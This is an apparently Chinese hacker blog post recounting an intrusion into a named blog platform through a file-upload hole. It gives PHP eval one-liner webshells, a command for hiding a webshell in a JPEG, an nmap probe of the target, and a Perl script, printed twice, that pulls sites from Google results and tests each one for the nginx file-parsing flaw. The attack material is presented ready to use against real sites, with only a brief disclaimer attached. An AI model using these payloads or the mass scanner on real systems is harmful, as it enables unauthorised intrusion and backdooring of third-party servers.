上传了个AspWebshell居然执行了代码,便想到利用它来包含生成PHP一句话。
具体说就是利用ASP语句嵌入创建一句话php版
代码内容:
例:<?php fputs(fopen(./p_w_upload/201011/x,w),<?eval($_POST[isun0804]);?>)?>
执行后在p_w_upload/201011/目录下生成x.php密码isun0804
此代码仅参考,其它脚本语言类似。
利用copy x.jpg /b + 1.php /a php.jpg生成图片木马
再次上传 ,要是有IIS6.0文件解析问题就好了
想到nginx文件解析漏洞
新建TXT文本 找一张图片 TXT文本保存PHP一句话 <?php eval($_POST[cmd])?>
例如我们图片名字为1.jpg ,txt里是一句话,php.jpg后缀名不用变,确切的说一句话和TXT一句话合成一个图片就可以了
例如我们图片名字为1.jpg ,txt里是一句话,php.jpg后缀名不用变,确切的说一句话和TXT一句话合成一个图片就可以了
CMD下执行copy 1.jpg /b + 1.txt/a php.jpg
或者这样Http://isun0804.blog.51cto.com/1.txt/1.php图片也需要做下修改
扫描51CTO服务器nginx版本
nmap -sV -PN isun0804.blog.51cto.com -p 80 (网站有防PING用-pn)
PS:图片是我从网上找的
附:GOOGLE扫描nginx文件解析Exp
Code: [Copy to clipboard]
#!usr/bin/perl -w
use LWP;
use LWP::ConnCache;
#use WWW::Mechanize;
my $mach = "filetype:php ";
$mach .= $ARGV[0]||"";
if (!defined $ARGV[0]){
print "请提交GOOGLE搜索关键\n默认搜索文件类型为PHP的所有站点\n";
}
my $browser = LWP::UserAgent->new;
my @headers = (
'User-Agent' => 'Mozilla/4.76 [en] (Win98; U)',
'Accept' => 'p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, p_w_picpath/png, */*',
'Accept-Charset' => 'iso-8859-1,*,utf-8',
'Accept-Language' => 'en-US',
);
$browser->timeout( 15 );
my $conncache = LWP::ConnCache->new;
$browser->conn_cache($conncache);
my $i = 0;
while (1) {
my $searchurl = "http://www.google.com/search?q=".$mach."&hl=zh-CN&start=".$i."&sa=N";
my $response = $browser->get( $searchurl,@headers);
die "Can't get $searchurl --", $response->status_line
unless $response->is_success;
my $content = $response->content;
#print $content;
while ($content =~ m{<font color="green">(http[s]?://[^<>/]*)(?:[^<>]*)\s+-\s\w+k</font>}g)
{
$url = $1;
if ( $url !~ /google/){
print "link found: $url\n";
scan0day($url);
}
}
$i += 10;
sleep(2);
}
sub scan0day {
print "目前正在扫描:$_[0]\n";
my $response= $browser->get( $url );
$response->is_success or print ("Failed to get '$url':\n", $response->status_line);
my $servertype = $response->server;
last unless defined $servertype;
print "$servertype\n";
if ($servertype=~/nginx/){
my $gifpath = getgifpath($url);
#print $gifpath;
$gifpath =~ s/^(http[s]?:\/\/(?:[^\/]*))(\/.*)$/$2/g;
if (substr($gifpath,0,1) ne '/') {
$gifpath = '/'.$gifpath;
}
if (substr($gifpath,0,2) eq './') {
$gifpath = substr($gifpath,indexof($gifpath,'.')+2);
}
my $url1 = $url.$gifpath;
my $url2 = $url.$gifpath.'/php.php';
my $response1 = $browser->get( $url1 );
$response1->is_success or print ("Failed to get '$url1':\n", $response1->status_line);
my $typeold=$response1->content_type;
print "$url1: $typeold\n";
my $response2 = $browser->get( $url2 );
$response2->is_success or print ("Failed to get '$url2':\n", $response1->status_line);
my $typenew=$response2->content_type;
print "$url2: $typenew\n";
if ($typeold eq $typenew){
print "站点 $url 暂没有发现漏洞.\n\n";
}else{
open RLOG,'>>', 'rlog.txt' or die "打开日志文件rlog.txt错误\n",$@;
RLOG->autoflush(1);
print RLOG "站点 $url 存在该漏洞.\n\n";
print "站点 $url 存在该漏洞.\n\n";
close RLOG;
}
}else{
print "站点不是nginx,Sorry!\n\n";
}
}
sub getgifpath {
my $response= $browser->get( $url );
$response->is_success or print ("Failed to get '$url':\n", $response->status_line);
my $content = $response->content;
if ( $content =~ m{<img\s+src=(["']?)([^<>]*\.(gif|jpg|bmp|swf|txt))\1}g){
return $2;
}
}
#!usr/bin/perl -w
use LWP;
use LWP::ConnCache;
#use WWW::Mechanize;
my $mach = "filetype:php ";
$mach .= $ARGV[0]||"";
if (!defined $ARGV[0]){
print "请提交GOOGLE搜索关键\n默认搜索文件类型为PHP的所有站点\n";
}
my $browser = LWP::UserAgent->new;
my @headers = (
'User-Agent' => 'Mozilla/4.76 [en] (Win98; U)',
'Accept' => 'p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, p_w_picpath/png, */*',
'Accept-Charset' => 'iso-8859-1,*,utf-8',
'Accept-Language' => 'en-US',
);
$browser->timeout( 15 );
my $conncache = LWP::ConnCache->new;
$browser->conn_cache($conncache);
my $i = 0;
while (1) {
my $searchurl = "http://www.google.com/search?q=".$mach."&hl=zh-CN&start=".$i."&sa=N";
my $response = $browser->get( $searchurl,@headers);
die "Can't get $searchurl --", $response->status_line
unless $response->is_success;
my $content = $response->content;
#print $content;
while ($content =~ m{<font color="green">(http[s]?://[^<>/]*)(?:[^<>]*)\s+-\s\w+k</font>}g)
{
$url = $1;
if ( $url !~ /google/){
print "link found: $url\n";
scan0day($url);
}
}
$i += 10;
sleep(2);
}
sub scan0day {
print "目前正在扫描:$_[0]\n";
my $response= $browser->get( $url );
$response->is_success or print ("Failed to get '$url':\n", $response->status_line);
my $servertype = $response->server;
last unless defined $servertype;
print "$servertype\n";
if ($servertype=~/nginx/){
my $gifpath = getgifpath($url);
#print $gifpath;
$gifpath =~ s/^(http[s]?:\/\/(?:[^\/]*))(\/.*)$/$2/g;
if (substr($gifpath,0,1) ne '/') {
$gifpath = '/'.$gifpath;
}
if (substr($gifpath,0,2) eq './') {
$gifpath = substr($gifpath,indexof($gifpath,'.')+2);
}
my $url1 = $url.$gifpath;
my $url2 = $url.$gifpath.'/php.php';
my $response1 = $browser->get( $url1 );
$response1->is_success or print ("Failed to get '$url1':\n", $response1->status_line);
my $typeold=$response1->content_type;
print "$url1: $typeold\n";
my $response2 = $browser->get( $url2 );
$response2->is_success or print ("Failed to get '$url2':\n", $response1->status_line);
my $typenew=$response2->content_type;
print "$url2: $typenew\n";
if ($typeold eq $typenew){
print "站点 $url 暂没有发现漏洞.\n\n";
}else{
open RLOG,'>>', 'rlog.txt' or die "打开日志文件rlog.txt错误\n",$@;
RLOG->autoflush(1);
print RLOG "站点 $url 存在该漏洞.\n\n";
print "站点 $url 存在该漏洞.\n\n";
close RLOG;
}
}else{
print "站点不是nginx,Sorry!\n\n";
}
}
sub getgifpath {
my $response= $browser->get( $url );
$response->is_success or print ("Failed to get '$url':\n", $response->status_line);
my $content = $response->content;
if ( $content =~ m{<img\s+src=(["']?)([^<>]*\.(gif|jpg|bmp|swf|txt))\1}g){
return $2;
}
}
最后想说51cto的上传确实存在问题,特别在是文件过虑上,通过上面的总结我知道了为什么它会被人渗透成功,IT界的悲剧啊!
写出来只是想提醒下管理员,网络安全不是一个人问题需要大家共同努力
郑重声明:本文仅做技术交流,不承担任何法律责任,用于非法用途者后果请自负,Write By E网特种兵&HLboy.
郑重声明:本文仅做技术交流,不承担任何法律责任,用于非法用途者后果请自负,Write By E网特种兵&HLboy.
